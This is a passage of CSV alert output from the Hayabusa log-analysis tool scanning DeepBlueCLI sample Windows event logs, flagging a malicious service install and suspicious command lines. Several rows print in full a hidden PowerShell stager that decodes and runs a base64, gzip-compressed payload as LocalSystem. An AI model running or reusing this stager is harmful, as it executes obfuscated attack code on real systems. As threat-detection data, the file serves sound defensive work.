/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: SYyGmEHvgHiGYApk | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x12c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76Y
ZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x460 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 05:40:21.464 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x94c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 06:05:56.876 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x144 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 06:06:09.220 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe6c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 06:06:09.236 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xff8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 07:54:48.720 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc0c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 07:54:49.720 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c4 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 07:54:49.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xf50 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 07:55:08.329 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb0c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 08:06:57.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x85c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 08:06:57.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcf4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:07:47.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:07:48.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb78 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:07:48.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x37c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:08:02.052 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x708 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:08:08.052 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
+2016-08-19 11:12:51.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x238 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:12:51.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xe8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:19:46.662 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc68 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:19:47.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:19:47.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x994 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:20:06.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x998 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:20:16.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x3c0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:20:16.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x928 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 11:20:16.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd48 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 22:57:54.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c 
""""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 22:57:55.301 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xef8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 22:57:59.004 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x82c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 22:58:15.410 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbbc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 22:59:20.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb24 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 23:01:29.243 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x22c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 01:01:36.820 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xf8c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 01:01:36.883 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x268 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 01:01:36.898 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xc68 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
+2016-08-20 01:03:36.695 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x68c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 01:57:08.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xc5c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 02:02:48.677 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0xcbc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 02:02:52.614 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x598 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 05:09:55.671 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: 
IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 05:09:57.781 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb84 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 05:10:11.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe9c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 05:10:17.702 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-20 05:12:20.805 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xfd0 | User: IE10WIN7$ | LID: 